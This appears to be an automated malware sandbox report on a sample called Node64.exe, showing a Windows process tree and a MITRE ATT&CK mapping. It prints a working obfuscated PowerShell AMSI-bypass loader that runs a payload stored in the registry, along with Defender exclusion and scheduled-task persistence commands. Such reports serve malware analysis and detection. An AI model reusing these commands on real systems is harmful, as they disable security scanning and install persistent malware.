  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:NmGdSppURqqL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$MQoQQivOdnqpQn,[Parameter(Position=1)][Type]$brBwrasQPu)$tNVMvHtSxhf=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+'e'+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+'e'+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,S'+[Char](101)+''+[Char](97)+''+[Char](108)+'ed'+','+''+[Char](65)+'n'+'s'+''+'i'+'C'+'l'+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$tNVMvHtSxhf.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+''+[Char](99)+''+'i'+''+'a'+''+'l'+'N'+[Char](97)+''+[Char](109)+'e'+[Char](44)+'Hid'+'e'+'By'+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+'ime,'+'M'+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$tNVMvHtSxhf.DefineMethod(''+'I'+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+','+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+[Char](121)+'S'+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+'S'+''+'l'+''+'o'+''+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+'',$brBwrasQPu,$MQoQQivOdnqpQn).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+''+[Char](116)+''+[Char](105)+'m'+'e'+',M'+'a'+'na'+'g'+'e'+[Char](100)+'');Write-Output $tNVMvHtSxhf.CreateType();}$SOWVGuXakUZFC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+'s'+'t'+'e'+'m.'+[Char](100)+''+[Char](108)+'l')}).GetType('M'+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+''+'t'+''+'.'+'W'+'i'+''+'n'+''+[Char](51)+''+'2'+''+'.'+''+'U'+''+'n'+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+'ve'+[Char](77)+'e'+[Char](116)+'h'+'o'+''+[Char](100)+'s');$vXuVyjDcpUaZxj=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+'r'+[Char](111)+'c'+[Char](65)+''+[Char](100)+''+[Char](100)+''+[Char](114)+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+'u'+'b'+[Char](108)+'i'+'c'+''+[Char](44)+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HGXpWVZeCoipORtRsmd=NmGdSppURqqL @([String])([IntPtr]);$ZDOxEshTmBMFRKRmZMmVew=NmGdSppURqqL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$jGQpogqSIBl=$SOWVGuXakUZFC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+'M'+'o'+'d'+'ul'+'e'+'Han'+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'e'+'r'+''+[Char](110)+'el'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')));$zrftaLTEZxtDJV=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object](''+[Char](76)+''+'o'+'a'+'d'+''+[Char](76)+'ib'+'r'+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$JHlGsvfaGyzWHbMmv=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$jGQpogqSIBl,[Object]('Vir'+[Char](116)+'ua'+'l'+''+[Char](80)+'r'+[Char](111)+''+'t'+''+[Char](101)+''+[Char](99)+''+[Char](116)+'')));$WUegRNP=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zrftaLTEZxtDJV,$HGXpWVZeCoipORtRsmd).Invoke(''+[Char](97)+''+'m'+''+'s'+'i'+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'');$kykrGHgouzOPlRUcE=$vXuVyjDcpUaZxj.Invoke($Null,@([Object]$WUegRNP,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+''+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$PYOkbsexQE=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,4,[ref]$PYOkbsexQE);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$kykrGHgouzOPlRUcE,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($JHlGsvfaGyzWHbMmv,$ZDOxEshTmBMFRKRmZMmVew).Invoke($kykrGHgouzOPlRUcE,[uint32]8,0x20,[ref]$PYOkbsexQE);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue('$'+[Char](78)+'od'+[Char](101)+'s'+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1300

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1444

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1460

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1516

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1540

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1680
- C:\Windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2784

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1736

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1768

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1848

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1912

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1924

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1940

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1700

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2140

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2248

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2456

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2648

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2672

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2700

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3536

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3628
- C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe
  "C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Node64.exe"
  2⤵
  - Checks computer location settings
  - Adds Run key to start application
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2064
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1380
- - C:\Windows\System32\$Node32.exe
    "C:\Windows\System32\$Node32.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3964
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1840
- - C:\Windows\System32\$Node2Json.exe
    "C:\Windows\System32\$Node2Json.exe"
    3⤵
    - Executes dropped EXE
    PID:3788
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3464
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2288
- - C:\Windows\System32\$Node3Json.exe
    "C:\Windows\System32\$Node3Json.exe"
    3⤵
    - Executes dropped EXE
    PID:3280

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3748

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4036

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4104

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4344

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:3620

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3460

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4992

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:1892

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:2592

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
- Modifies data under HKEY_USERS
PID:3140

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3924

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
1⤵
PID:4284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:4748

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 3874f99676d2a171db1648b456c00305 AF6bVzg0Nk+Uob03FtQ14g.0.1.0.0.0
1⤵
PID:1456
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:388

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Enumerates system info in registry
PID:4636

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
PID:2724

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:4604

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:1192

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4296

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

System Information Discovery